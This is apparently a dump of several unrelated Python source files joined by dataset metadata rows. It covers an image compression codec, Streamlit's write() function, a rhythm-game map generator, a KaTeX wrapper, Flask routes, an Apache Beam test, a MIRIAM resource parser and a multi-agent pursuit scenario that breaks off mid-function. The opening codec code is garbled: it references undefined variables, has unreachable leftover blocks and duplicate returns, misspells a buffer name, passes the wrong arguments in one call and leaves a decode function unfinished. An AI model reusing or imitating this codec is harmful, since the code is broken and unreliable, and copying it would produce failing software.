# [<non-zero run 0:bytes>, <non-zero run 1:bytes>, ...<non-zero run m-1:bytes>]
# cmd bits:
# <copyflag:bit>, <buffer length:eliasgamma>,
# [<run length 0:eliasgamma>, <run length 1:eliasgamma>, ...<run length n-1:eliasgamma>]
def encode_zrle(hgslice:HgSlice, buffer:bytes) -> HgSlice:
"""encode_zrle(hgslice, data bytes) -> HgSlice(index, length, data bytearray, cmd bytearray)
"""
buflen = len(buffer)
## STEP 1 MEASURE: measure length and offset of all runs ##
# (to allocate correct buffer sizes the first time)
datalen = 0
cmdbitlen = 1 # 1 bit for consumed copyflag
cmdbitlen += sizeof_eliasgamma(buflen)
runs = [] # includes zero and non-zero runs
copyflag = bool(buffer[0]) # is first run non-zero data?
off = 0
while off < buflen:
runlen = 1 # starts with the first non-conforming byte reached last run
if copyflag:
# length of non-zero run
while off + runlen < buflen and buffer[off + runlen]:
runlen += 1
datalen += runlen
else:
# length of zero run
while off + runlen < buflen and not buffer[off + runlen]:
runlen += 1
#
runs.append(runlen)
cmdbitlen += sizeof_eliasgamma(runlen)
off += runlen
copyflag = not copyflag
## STEP 2 BUILD: non-zero data runs buffer, cmd bits buffer ##
data = bytearray(datalen) # already filled with zero-bytes
cmd = bytearray((cmdbitlen + 7) // 8)
copyflag = bool(buffer[0])
bitbuf = BitBuffer(cmd, len(cmd))
bitbuf.write_flag(copyflag)
bitbuf.write_eliasgamma(length)
off = dataoff = 0
for runlen in runs:
if copyflag:
data[dataoff:dataoff + runlen] = buffer[off:off + runlen]
dataoff += runlen
bitbuf.write_eliasgamma(runlen)
off += runlen
copyflag = not copyflag
return (data, cmd)
databuf, cmdbuf = bytearray(), bytearray()
deltalen = len(deltabuf)
copyflag = (deltabuf[0] != 0)
#
# cmd = BitBuffer(cmdbuf)
# #
# cmd.set_bit(copyflag)
# cmd.set_elias_gamma(deltalen)
firstcopy = copyflag
runs = []
cmdlen = 0
datalen = 0
#
i = 0
while i < deltalen:
n = 1
if copyflag: # copy fill
while i+n < deltalen and deltabuf[i+n] != 0:
n += 1
#
#databuf.extend(deltabuf[i:i+n])
datalen += n
#
else: # zero fill
while i+n < deltalen and deltabuf[i+n] == 0:
n += 1
#
#cmd.set_elias_gamma(n)
cmdlen += elias_gamma_size(n)
runs.append(n)
#
i += n
copyflag = not copyflag
#
cmdlen += elias_gamma_size(datalen)
cmdlen += 1 # copyflag bit
#
return ((datalen, cmdlen // 8), copyflag, runs)
return databuf, cmdbuf
def decode_zrle(hgslice:HgSlice, data:bytes, cmd:bytes) -> bytearray:
"""decode_zrle(hgslice, data bytes, cmd bytes) -> buffer bytearray
"""
bifbuf = BitBuffer(cmd, len(cmd))
copyflag = bitbuf.read_flag() # is first run non-zero data?
buflen = bitbuf.read_eliasgamma() # length of output buffer (usually height x stride)
buffer = bytearray(buflen) # already filled with zero-bytes
off = dataoff = 0
while off < buflen:
runlen = bitbuf.read_eliasgamma()
#
if copyflag:
# Copy non-zero data into ouput buffer
buffer[off:off + runlen] = data[dataoff:dataoff + runlen]
dataoff += runlen
#else skip zero bytes, buffer already filled with zero-bytes
off += runlen
copyflag = not copyflag
return buffer
## ENCODE/DECODE BLOCKS ##
def encode_blocks(hgslice:HgSlice, delta:bytes, width:int, height:int, bpp:int) -> bytearray:
"""encode_blocks(hgslice, delta bytes, width, height, bpp) -> blocks bytearray
"""
abstable = make_abs_tables()[0] # fwd abstable
stride = ((width * bpp + 7) // 8 + 3) & ~0x3
bufstart = hgslice.index * stride
bufend = (hgslice.index + hgslice.length) * stride
sectlen = hgslice.length * stride // 4
blocks = bytearray(sectlen * 4)
# first loop through the entire delta slice and perform absolute transform
for i in range(bufstart, bufend, 1):
delta[i] = abstable[delta[i]]
# Iterate through each section one at a time, each pass
# through delta encodes a different mask (section/block) of bytes
dst = 0
# Section masks: [0xc0c0c0c0, 0x30303030, 0x0c0c0c0c, 0x03030303]
for k in range(6, -1, -2): # current section
src = bufstart
for i in range(sectlen): # section iteration
val = 0
for j in range(0, 8, 2): # section mask to byte
val |= (((delta[src] >> k) & 0x3) << j)
src += 1
blocks[dst] = val & 0xff
dst += 1
return blocks
def decode_blocks(hgslice:HgSlice, blocks:bytes, width:int, height:int, bpp:int) -> bytearray:
"""decode_blocks(hgslice, blocks bytes, width, height, bpp) -> delta bytearray
"""
table0, table1, table2, table3 = make_weight_tables()
invtable = make_abs_tables()[1] # inv abstable
stride = ((width * bpp + 7) // 8 + 3) & ~0x3
bufstart = hgslice.index * stride
#bufend = (hgslice.index + hgslice.length) * stride
sectlen = hgslice.length * stride // 4
#sect0, sect1, sect2, sect3 = range(bufstart, bufstart + sectlen * 4, sectlen)
sect0, sect1, sect2, sect3 = range(0, sectlen * 4, sectlen)
delta = bytearray(sectlen * 4)
for i, j in zip(range(sectlen), range(0, sectlen * 4, 4)):
val = (table0[blocks[sect0 + i]] | table1[blocks[sect1 + i]] |
table2[blocks[sect2 + i]] | table3[blocks[sect3 + i]])
delta[j ] = invtable[(val ) & 0xff]
delta[j + 1] = invtable[(val >> 8) & 0xff]
delta[j + 2] = invtable[(val >> 16) & 0xff]
delta[j + 3] = invtable[(val >> 24) ]
return delta
## ENCODE/DECODE DELTA ##
def encode_delta(hgslice:HgSlice, pixels:bytes, width:int, height:int, bpp:int) -> bytearray:
"""encode_delta(hgslice, pixels bytes, width, height, bpp) -> delta bytearray
"""
bytedepth = (bpp + 7) // 8
stride = ((width * bpp + 7) // 8 + 3) & ~0x3
bufstart = hgslice.index * stride
bufend = (hgslice.index + hgslice.length) * stride
delta = bytearray(pixels)
# delta RGB(A) channels of each previous stride in all but first row
for yi, yj in zip(range(bufend - 1, bufstart + stride - 1, -1),
range(bufend - stride - 1, bufstart - 1, -1)):
delta[yi] = (delta[yi] - delta[yj]) & 0xff
# delta RGB(A) channels of each previous pixel in first row
for xi, xj in zip(range(bufstart + stride - 1, bufstart + bytedepth - 1, -1),
range(bufstart + stride - bytedepth - 1, bufstart - 1, -1)):
delta[xi] = (delta[xi] - delta[xj]) & 0xff
return delta
def decode_delta(hgslice:HgSlice, delta:bytes, width:int, height:int, bpp:int) -> bytearray:
"""decode_delta(hgslice, delta bytes, width, height, bpp) -> pixels bytearray
"""
bytedepth = (bpp + 7) // 8
stride = ((width * bpp + 7) // 8 + 3) & ~0x3
bufstart = hgslice.index * stride
bufend = (hgslice.index + hgslice.length) * stride
# undelta RGB(A) channels of each previous pixel in first row
for xi, xj in zip(range(bufstart + bytedepth, bufend + stride, 1),
range(bufstart, bufend + stride - bytedepth, 1)):
delta[xi] = (delta[xi] + delta[xj]) & 0xff
# undelta RGB(A) channels of each previous stride in all but first row
for yi, yj in zip(range(bufstart + stride, bufstart, 1),
range(bufstart, bufstart - stride, 1)):
delta[yi] = (delta[yi] + delta[yj]) & 0xff
pixels = bytearray(delta)
return pixels
## ENCODE/DECODE SLICES ##
def encode_slice(hgslice:HgSlice, pixels:bytes, width:int, height:int, bpp:int) -> HgSlice:
"""encode_slice(hgslice, pixels bytes, width, height, bpp) -> HgData(data bytearray, cmd bytearray)
"""
delta = encode_delta(hgslice, pixels, width, height, bpp)
blocks = encode_blocks(hgslice, width, height, bpp)
data, cmd = encode_zrle(hgslice, blocks)
return HgData(data, cmd)
def decode_slice(hgslice:HgSlice, hgdata:HgData, width:int, height:int, bpp:int) -> bytearray:
"""decode_slice(hgslice, HgData(data bytes, cmd bytes), width, height, bpp) -> pixels bytearray
"""
data, cmd = decode_zrle(hgslice, hgdata.data, hgdata.cmd)
## CLEANUP ##
del enum, collections # only used during type declarations
del Iterable, Iterator, List, Optional, NoReturn, Tuple, Type, Union # only used during declarations
| 37.519454
| 192
| 0.551814
|
4a0a2de4a48a72bb8154ec6eceb7b65dad656e62
| 8,724
|
py
|
Python
|
lib/streamlit/elements/write.py
|
rpyleonard/streamlit
|
2d523cfe9a2a211602bb883de028c5bb85558f5f
|
[
"Apache-2.0"
] | 1
|
2021-01-29T02:32:53.000Z
|
2021-01-29T02:32:53.000Z
|
lib/streamlit/elements/write.py
|
PickMio/streamlit
|
bd41a464d010db587b5e5709ab68d062af0c14d9
|
[
"Apache-2.0"
] | 64
|
2021-01-06T17:40:21.000Z
|
2022-03-25T05:12:26.000Z
|
lib/streamlit/elements/write.py
|
PickMio/streamlit
|
bd41a464d010db587b5e5709ab68d062af0c14d9
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018-2020 Streamlit Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json as json
import types
from typing import cast, Any, List, Tuple, Type
import numpy as np
import streamlit
from streamlit import type_util
from streamlit.errors import StreamlitAPIException
# Special methods:
HELP_TYPES = (
types.BuiltinFunctionType,
types.BuiltinMethodType,
types.FunctionType,
types.MethodType,
types.ModuleType,
) # type: Tuple[Type[Any], ...]
class WriteMixin:
def write(self, *args, **kwargs):
"""Write arguments to the app.
This is the Swiss Army knife of Streamlit commands: it does different
things depending on what you throw at it. Unlike other Streamlit commands,
write() has some unique properties:
1. You can pass in multiple arguments, all of which will be written.
2. Its behavior depends on the input types as follows.
3. It returns None, so it's "slot" in the App cannot be reused.
Parameters
----------
*args : any
One or many objects to print to the App.
Arguments are handled as follows:
- write(string) : Prints the formatted Markdown string, with
support for LaTeX expression and emoji shortcodes.
See docs for st.markdown for more.
- write(data_frame) : Displays the DataFrame as a table.
- write(error) : Prints an exception specially.
- write(func) : Displays information about a function.
- write(module) : Displays information about the module.
- write(dict) : Displays dict in an interactive widget.
- write(obj) : The default is to print str(obj).
- write(mpl_fig) : Displays a Matplotlib figure.
- write(altair) : Displays an Altair chart.
- write(keras) : Displays a Keras model.
- write(graphviz) : Displays a Graphviz graph.
- write(plotly_fig) : Displays a Plotly figure.
- write(bokeh_fig) : Displays a Bokeh figure.
- write(sympy_expr) : Prints SymPy expression using LaTeX.
unsafe_allow_html : bool
This is a keyword-only argument that defaults to False.
By default, any HTML tags found in strings will be escaped and
therefore treated as pure text. This behavior may be turned off by
setting this argument to True.
That said, *we strongly advise* against it*. It is hard to write secure
HTML, so by using this argument you may be compromising your users'
security. For more information, see:
https://github.com/streamlit/streamlit/issues/152
**Also note that `unsafe_allow_html` is a temporary measure and may be
removed from Streamlit at any time.**
If you decide to turn on HTML anyway, we ask you to please tell us your
exact use case here:
https://discuss.streamlit.io/t/96 .
This will help us come up with safe APIs that allow you to do what you
want.
Example
-------
Its basic use case is to draw Markdown-formatted text, whenever the
input is a string:
>>> write('Hello, *World!* :sunglasses:')
.. output::
https://static.streamlit.io/0.50.2-ZWk9/index.html?id=Pn5sjhgNs4a8ZbiUoSTRxE
height: 50px
As mentioned earlier, `st.write()` also accepts other data formats, such as
numbers, data frames, styled data frames, and assorted objects:
>>> st.write(1234)
>>> st.write(pd.DataFrame({
... 'first column': [1, 2, 3, 4],
... 'second column': [10, 20, 30, 40],
... }))
.. output::
https://static.streamlit.io/0.25.0-2JkNY/index.html?id=FCp9AMJHwHRsWSiqMgUZGD
height: 250px
Finally, you can pass in multiple arguments to do things like:
>>> st.write('1 + 1 = ', 2)
>>> st.write('Below is a DataFrame:', data_frame, 'Above is a dataframe.')
.. output::
https://static.streamlit.io/0.25.0-2JkNY/index.html?id=DHkcU72sxYcGarkFbf4kK1
height: 300px
Oh, one more thing: `st.write` accepts chart objects too! For example:
>>> import pandas as pd
>>> import numpy as np
>>> import altair as alt
>>>
>>> df = pd.DataFrame(
... np.random.randn(200, 3),
... columns=['a', 'b', 'c'])
...
>>> c = alt.Chart(df).mark_circle().encode(
... x='a', y='b', size='c', color='c', tooltip=['a', 'b', 'c'])
>>>
>>> st.write(c)
.. output::
https://static.streamlit.io/0.25.0-2JkNY/index.html?id=8jmmXR8iKoZGV4kXaKGYV5
height: 200px
"""
string_buffer = [] # type: List[str]
unsafe_allow_html = kwargs.get("unsafe_allow_html", False)
# This bans some valid cases like: e = st.empty(); e.write("a", "b").
# BUT: 1) such cases are rare, 2) this rule is easy to understand,
# and 3) this rule should be removed once we have st.container()
if not self.dg._is_top_level and len(args) > 1:
raise StreamlitAPIException(
"Cannot replace a single element with multiple elements.\n\n"
"The `write()` method only supports multiple elements when "
"inserting elements rather than replacing. That is, only "
"when called as `st.write()` or `st.sidebar.write()`."
)
def flush_buffer():
if string_buffer:
self.dg.markdown(
" ".join(string_buffer),
unsafe_allow_html=unsafe_allow_html,
)
string_buffer[:] = []
for arg in args:
# Order matters!
if isinstance(arg, str):
string_buffer.append(arg)
elif type_util.is_dataframe_like(arg):
flush_buffer()
if len(np.shape(arg)) > 2:
self.dg.text(arg)
else:
self.dg.dataframe(arg)
elif isinstance(arg, Exception):
flush_buffer()
self.dg.exception(arg)
elif isinstance(arg, HELP_TYPES):
flush_buffer()
self.dg.help(arg)
elif type_util.is_altair_chart(arg):
flush_buffer()
self.dg.altair_chart(arg)
elif type_util.is_type(arg, "matplotlib.figure.Figure"):
flush_buffer()
self.dg.pyplot(arg)
elif type_util.is_plotly_chart(arg):
flush_buffer()
self.dg.plotly_chart(arg)
elif type_util.is_type(arg, "bokeh.plotting.figure.Figure"):
flush_buffer()
self.dg.bokeh_chart(arg)
elif type_util.is_graphviz_chart(arg):
flush_buffer()
self.dg.graphviz_chart(arg)
elif type_util.is_sympy_expession(arg):
flush_buffer()
self.dg.latex(arg)
elif type_util.is_keras_model(arg):
from tensorflow.python.keras.utils import vis_utils
flush_buffer()
dot = vis_utils.model_to_dot(arg)
self.dg.graphviz_chart(dot.to_string())
elif isinstance(arg, (dict, list)):
flush_buffer()
self.dg.json(arg)
elif type_util.is_namedtuple(arg):
flush_buffer()
self.dg.json(json.dumps(arg._asdict()))
elif type_util.is_pydeck(arg):
flush_buffer()
self.dg.pydeck_chart(arg)
else:
string_buffer.append("`%s`" % str(arg).replace("`", "\\`"))
flush_buffer()
@property
def dg(self) -> "streamlit.delta_generator.DeltaGenerator":
"""Get our DeltaGenerator."""
return cast("streamlit.delta_generator.DeltaGenerator", self)
| 38.09607
| 89
| 0.576112
|
4a0a2e9704af8a9a89a32122e52c44c8cd813e62
| 675
|
py
|
Python
|
api/generators/MapGeneratorBeatStrategy.py
|
strategineer/lynchman
|
7b07c15c801841ad3f94734d6912d248c3f1bcbd
|
[
"MIT"
] | 1
|
2019-04-12T23:49:01.000Z
|
2019-04-12T23:49:01.000Z
|
api/generators/MapGeneratorBeatStrategy.py
|
KeikakuB/lynchman
|
7b07c15c801841ad3f94734d6912d248c3f1bcbd
|
[
"MIT"
] | null | null | null |
api/generators/MapGeneratorBeatStrategy.py
|
KeikakuB/lynchman
|
7b07c15c801841ad3f94734d6912d248c3f1bcbd
|
[
"MIT"
] | 1
|
2021-08-15T13:15:07.000Z
|
2021-08-15T13:15:07.000Z
|
from .MapGeneratorStrategy import MapGeneratorStrategy
from api.data.Block import Block
import api.data.Constants
from api.data.JsonNoteType import JsonNoteType
class MapGeneratorBeatStrategy(MapGeneratorStrategy):
"""This strategy generates a map in which the same note is placed on every beat."""
def __init__(self, song):
MapGeneratorStrategy.__init__(self, song)
def _generate(self):
beat_times = self._song.get_beat_times()
for i in range(0, len(beat_times), 2):
b = beat_times[i]
self._add_note(float("{:.16f}".format(b)), Block(JsonNoteType.RIGHT.value, (2, 0) , api.data.Constants.N_CUT_DIRECTIONS - 1))
| 39.705882
| 137
| 0.715556
|
4a0a2f2be776f10b0b810e13854bba629751c666
| 629
|
py
|
Python
|
utils/md/katex.py
|
zerolfx/aiplay-api
|
73161ce8fba67c392df73b452984f6cb09fc48e7
|
[
"MIT"
] | 3
|
2017-02-21T01:11:45.000Z
|
2020-11-17T13:08:12.000Z
|
utils/md/katex.py
|
zerolfx/aiplay-api
|
73161ce8fba67c392df73b452984f6cb09fc48e7
|
[
"MIT"
] | null | null | null |
utils/md/katex.py
|
zerolfx/aiplay-api
|
73161ce8fba67c392df73b452984f6cb09fc48e7
|
[
"MIT"
] | null | null | null |
import re
import subprocess
_katex_error_message = '<span class="katex">ERROR</span>'
_katex_empty_message = '<span class="katex"></span>'
def convert(eqn_string):
""" Takes equation string, e.g. "E = mc^2", and outputs KaTeX HTML """
import os
command = ['node', os.path.join(os.path.dirname(__file__), 'katex.port.js'), eqn_string]
try:
process = subprocess.Popen(command, stdout=subprocess.PIPE)
process.wait(20)
if process.returncode != 0:
raise ReferenceError
return process.stdout.read().decode()
except ReferenceError:
return _katex_error_message
| 31.45
| 92
| 0.666137
|
4a0a2f333920d67bb54bcdc40d8b37e9cfb2fe50
| 1,711
|
py
|
Python
|
app/blueprints/open/routes/projects.py
|
neurothrone/project-dot
|
20889075611bed645689a76a30257f96e4b55988
|
[
"MIT"
] | null | null | null |
app/blueprints/open/routes/projects.py
|
neurothrone/project-dot
|
20889075611bed645689a76a30257f96e4b55988
|
[
"MIT"
] | null | null | null |
app/blueprints/open/routes/projects.py
|
neurothrone/project-dot
|
20889075611bed645689a76a30257f96e4b55988
|
[
"MIT"
] | null | null | null |
from flask import flash, make_response, redirect, render_template, request, url_for
from .. import bp_open
from app.controllers.project import ProjectController
@bp_open.get("/projects")
def projects():
search_text = request.args.get("search_text", "")
page = request.args.get("page", 1, type=int)
paginator = ProjectController.get_all_by_ilike_title_paginated(search_text, page)
return render_template("open/projects/index.html",
search_text=search_text,
paginator=paginator)
@bp_open.get("/projects/search")
def search_projects():
# htmx passes a header
is_htmx_request = "HX-Request" in request.headers
search_text = request.args.get("search_text", "")
page = request.args.get("page", 1, type=int)
paginator = ProjectController.get_all_by_ilike_title_paginated(search_text, page)
# if HTMX-originated return a partial response
if is_htmx_request:
html = render_template(
"open/shared/partials/projects_search_results.html",
search_text=search_text,
paginator=paginator)
return make_response(html)
# return a full response
return render_template("open/shared/partials/search.html",
search_text=search_text,
paginator=paginator)
@bp_open.get("/projects/<int:project_id>")
def view_project(project_id: int):
if not (project := ProjectController.get_by_id(project_id)):
flash("There is no project by that id.", category="error")
return redirect(url_for(".index"))
return render_template("open/projects/view_project.html",
project=project)
| 36.404255
| 85
| 0.672706
|
4a0a2fc1802398f01e29a4b0b2f1080e56ffce07
| 4,522
|
py
|
Python
|
sdks/python/apache_beam/examples/complete/autocomplete_test.py
|
prabhaarya/beam
|
150e311a0d78f827396dd5090004752134622771
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
sdks/python/apache_beam/examples/complete/autocomplete_test.py
|
prabhaarya/beam
|
150e311a0d78f827396dd5090004752134622771
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 6
|
2022-02-18T15:52:33.000Z
|
2022-03-09T22:25:01.000Z
|
sdks/python/apache_beam/examples/complete/autocomplete_test.py
|
prabhaarya/beam
|
150e311a0d78f827396dd5090004752134622771
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Test for the autocomplete example."""
# pytype: skip-file
import logging
import os
import re
import tempfile
import unittest
import pytest
import apache_beam as beam
from apache_beam.examples.complete import autocomplete
from apache_beam.testing.test_pipeline import TestPipeline
from apache_beam.testing.test_utils import compute_hash
from apache_beam.testing.util import assert_that
from apache_beam.testing.util import equal_to
from apache_beam.testing.util import open_shards
def format_output_file(output_string):
def extract_prefix_topk_words_tuples(line):
match = re.match(r'(.*): \[(.*)\]', line)
prefix = match.group(1)
topK_words_string = extract_top_k_words_tuples(match.group(2))
return prefix, topK_words_string
def extract_top_k_words_tuples(top_k_words_string):
top_k_list = top_k_words_string.split("), (")
return tuple(
map(
lambda top_k_string: tuple(format_top_k_tuples(top_k_string)),
top_k_list))
def format_top_k_tuples(top_k_string):
(frequency, words) = top_k_string.replace('(', '').replace(')', '').replace(
'\"', '').replace('\'', '').replace(' ', '').split(',')
return int(frequency), words
return list(
map(
lambda line: extract_prefix_topk_words_tuples(line),
output_string.split('\n')))
def create_content_input_file(path, contents):
logging.info('Creating temp file: %s', path)
with open(path, 'w') as f:
f.write(contents)
class AutocompleteTest(unittest.TestCase):
WORDS = ['this', 'this', 'that', 'to', 'to', 'to']
KINGLEAR_HASH_SUM = 268011785062540
KINGLEAR_INPUT = 'gs://dataflow-samples/shakespeare/kinglear.txt'
EXPECTED_PREFIXES = [
('t', ((3, 'to'), (2, 'this'), (1, 'that'))),
('to', ((3, 'to'), )),
('th', ((2, 'this'), (1, 'that'))),
('thi', ((2, 'this'), )),
('this', ((2, 'this'), )),
('tha', ((1, 'that'), )),
('that', ((1, 'that'), )),
]
def test_top_prefixes(self):
with TestPipeline() as p:
words = p | beam.Create(self.WORDS)
result = words | autocomplete.TopPerPrefix(5)
# values must be hashable for now
result = result | beam.Map(lambda k_vs: (k_vs[0], tuple(k_vs[1])))
assert_that(result, equal_to(self.EXPECTED_PREFIXES))
@pytest.mark.it_postcommit
def test_autocomplete_it(self):
with TestPipeline(is_integration_test=True) as p:
words = p | beam.io.ReadFromText(self.KINGLEAR_INPUT)
result = words | autocomplete.TopPerPrefix(10)
# values must be hashable for now
result = result | beam.Map(
lambda k_vs: [k_vs[0], k_vs[1][0][0], k_vs[1][0][1]])
checksum = (
result
| beam.Map(lambda x: int(compute_hash(x)[:8], 16))
| beam.CombineGlobally(sum))
assert_that(checksum, equal_to([self.KINGLEAR_HASH_SUM]))
@pytest.mark.no_xdist
@pytest.mark.examples_postcommit
def test_autocomplete_output_files_on_small_input(self):
test_pipeline = TestPipeline(is_integration_test=True)
# Setup the files with expected content.
temp_folder = tempfile.mkdtemp()
create_content_input_file(
os.path.join(temp_folder, 'input.txt'), ' '.join(self.WORDS))
extra_opts = {
'input': '%s/input.txt' % temp_folder,
'output': os.path.join(temp_folder, 'result')
}
autocomplete.run(test_pipeline.get_full_options_as_args(**extra_opts))
# Load result file and compare.
with open_shards(os.path.join(temp_folder, 'result-*-of-*')) as result_file:
result = result_file.read().strip()
self.assertEqual(
sorted(self.EXPECTED_PREFIXES), sorted(format_output_file(result)))
if __name__ == '__main__':
unittest.main()
| 34
| 80
| 0.683547
|
4a0a2fd1f0b4f985eb69e4c04916a8c78c567c35
| 1,603
|
py
|
Python
|
cbmpy-tools/miriam-tools/parseMIRIAM.py
|
bgoli/cbmpy-dev
|
04a6179af8e04aefdb49ed97f34544ede8180005
|
[
"BSD-2-Clause"
] | null | null | null |
cbmpy-tools/miriam-tools/parseMIRIAM.py
|
bgoli/cbmpy-dev
|
04a6179af8e04aefdb49ed97f34544ede8180005
|
[
"BSD-2-Clause"
] | null | null | null |
cbmpy-tools/miriam-tools/parseMIRIAM.py
|
bgoli/cbmpy-dev
|
04a6179af8e04aefdb49ed97f34544ede8180005
|
[
"BSD-2-Clause"
] | null | null | null |
import os, time, numpy, re, pprint
cDir = os.path.dirname(os.path.abspath(os.sys.argv[0]))
#import pyscescbm as cbm
PP = pprint.PrettyPrinter()
## mDir = os.path.join(cDir, 'miriam')
mDir = cDir
mFile = os.path.join(mDir,'miriamresources.xml')
F = file(mFile,'r')
res = F.read()
F.close()
datatype = re.compile('<datatype id=.*?</datatype>', re.DOTALL)
res2 = re.findall(datatype, res)
print len(res2)
name = re.compile('<name>.*?</name>')
uri = re.compile('<uri type="URL">.*?</uri>')
dataEntry = re.compile('<dataEntry>.*?</dataEntry>', re.DOTALL)
regex = re.compile('pattern=.*?>')
exam = re.compile('<dataEntityExample>.*?</dataEntityExample>')
out = {}
for r_ in res2:
nm = re.findall(name, r_)[0].replace('<name>','').replace('</name>','').strip()
ur = re.findall(uri, r_)[0].replace('<uri type="URL">','').replace('</uri>','').strip()
de = re.findall(dataEntry, r_)[0].replace('<dataEntry>','').replace('</dataEntry>','').strip()
rx = re.findall(regex, r_)[0].replace(' restricted="true"', '').replace('pattern="','').replace('">','').strip()
ex = re.findall(exam, r_)
if len(ex) > 0:
ex = ex[0].replace('<dataEntityExample>','').replace('</dataEntityExample>','').strip()
else:
ex = None
out.update({ nm : {
'name' : nm,
'url' : ur,
'data_entry' : de,
'pattern' : rx,
'example' : ex
}})
p = PP.pformat(out)
print p
F = file(os.path.join(mDir, 'miriamids.py'), 'w')
F.write('# created on %s\n\n' % time.strftime('%y%m%d:%H%M'))
F.write('miriamids =\\\n')
F.write(p)
F.write('\n')
F.close()
| 29.145455
| 116
| 0.584529
|
4a0a30d7a080e8ba6d2609f54bce73be26709ec9
| 9,720
|
py
|
Python
|
multiagent/scenarios/simple_tax_noop.py
|
ngrupen/multiagent-particle-envs
|
0379c39ed5792a08c2e23a7183d2f690af38fcc6
|
[
"MIT"
] | null | null | null |
multiagent/scenarios/simple_tax_noop.py
|
ngrupen/multiagent-particle-envs
|
0379c39ed5792a08c2e23a7183d2f690af38fcc6
|
[
"MIT"
] | null | null | null |
multiagent/scenarios/simple_tax_noop.py
|
ngrupen/multiagent-particle-envs
|
0379c39ed5792a08c2e23a7183d2f690af38fcc6
|
[
"MIT"
] | null | null | null |
import numpy as np
import math
from multiagent.core import World, Agent, Landmark, Wall
from multiagent.scenario import BaseScenario
from multiagent.utils import overlaps, toroidal_distance
COLOR_SCHEMES = {
'regular' : [np.array([0.85, 0.35, 0.35]), np.array([0.85, 0.35, 0.35]), np.array([0.85, 0.35, 0.35])],
'two_slow' : [np.array([0.85, 0.35, 0.35]), np.array([0.45, 0.15, 0.0]), np.array([0.45, 0.15, 0.0])],
'two_fast' : [np.array([0.85, 0.35, 0.35]), np.array([0.85, 0.35, 0.35]), np.array([0.15, 0.05, 0.0])],
'staggered' : [np.array([0.85, 0.35, 0.35]), np.array([0.55, 0.25, 0.65]), np.array([0.55, 0.25, 0.0])]
}
class Scenario(BaseScenario):
def make_world(self, size=6.0, n_preds=3, pred_vel=1.2, prey_vel=1.0, cap_reward = 50.0, tax=0.0, discrete=True,
partial=False, symmetric=False, action_penalty=0.0, color_scheme='regular'):
world = World()
# set any world properties
world.n_steps = 500
world.torus = True
world.dim_c = 2
world.size = size
world.origin = np.array([world.size/2, world.size/2])
world.use_sensor_range = False
world.cap_reward = cap_reward
world.partial = partial
world.tax = tax
world.symmetric = symmetric
world.action_penalty = action_penalty
world.predator_colors = COLOR_SCHEMES[color_scheme]
print('world size = {}'.format(world.size))
print('pred vel = {}'.format(pred_vel))
print('prey vel = {}'.format(prey_vel))
print('tax = {}'.format(world.tax))
print('action penalty = {}'.format(world.action_penalty))
print('capture reward = {}'.format(world.cap_reward))
num_good_agents = 1
self.n_preds = num_adversaries = n_preds
num_agents = num_adversaries + num_good_agents
num_landmarks = 0
# add agents
world.agents = [Agent() for i in range(num_agents)]
for i, agent in enumerate(world.agents):
agent.name = 'agent {}'.format(i)
agent.id = i
agent.active = True
agent.captured = False
agent.collide = True
agent.silent = True
agent.adversary = True if i < num_adversaries else False
agent.size = 0.075 if agent.adversary else 0.05
agent.accel = 20.0 if agent.adversary else 20.0
if agent.adversary:
if isinstance(pred_vel, list):
agent.max_speed = pred_vel[i]
else:
agent.max_speed = pred_vel
else:
agent.max_speed = prey_vel
print('n_preds = {}'.format(len(world.agents) - 1))
# discrete actions
world.discrete_actions = discrete
# make initial conditions
self.reset_world(world)
return world
def reset_world(self, world):
world.origin = np.array([world.size/2, world.size/2])
print('world size = {}'.format(world.size))
print('pred vel = {}'.format(world.agents[0].max_speed))
print('prey vel = {}'.format(world.agents[-1].max_speed))
print('tax = {}'.format(world.tax))
print('action penalty = {}'.format(world.action_penalty))
print('capture reward = {}'.format(world.cap_reward))
# agent color
for i, agent in enumerate(world.agents):
if agent.adversary:
agent.color = world.predator_colors[i]
else:
agent.color = np.array([0.35, 0.85, 0.35])
# properties for landmarks
for i, landmark in enumerate(world.landmarks):
landmark.color = np.array([0.25, 0.25, 0.25])
# generate predators in random circle of random radius with random angles
redraw = True
while redraw:
# draw location for prey
prey_pt = world.origin + np.random.normal(0.0, 0.0001, size=2)
# draw predator locations
init_pts = [np.random.uniform(0.0, world.size, size=2) for _ in range(self.n_preds)]
# init_pts = [np.array([1.5, 1.5]) + np.random.normal(0.0, 0.01, size=2), np.array([1.5, 1.5])+np.random.normal(0.0, 0.01, size=2), np.array([1.5, 1.5])]
# ensure predators not initialized on top of prey
redraw = overlaps(prey_pt, init_pts, world.size, threshold=0.5)
# set initial states
init_pts.append(prey_pt)
for i, agent in enumerate(world.agents):
agent.active = True
agent.captured = False
# agents can move beyond confines of camera image --> need to adjust coords accordingly
agent.state.coords = init_pts[i]
agent.state.p_pos = agent.state.coords % world.size
agent.state.p_vel = np.zeros(world.dim_p)
agent.state.theta = 0.0
agent.state.c = np.zeros(world.dim_c)
def benchmark_data(self, agent, world):
return { 'active' : agent.active }
def is_collision(self, agent1, agent2):
if agent1 == agent2:
return False
delta_pos = agent1.state.p_pos - agent2.state.p_pos
dist = np.sqrt(np.sum(np.square(delta_pos)))
dist_min = agent1.size + agent2.size
return True if dist < dist_min else False
# return all agents that are not adversaries
def good_agents(self, world):
return [agent for agent in world.agents if not agent.adversary]
# return all active agents that are not adversaries
def active_good_agents(self, world):
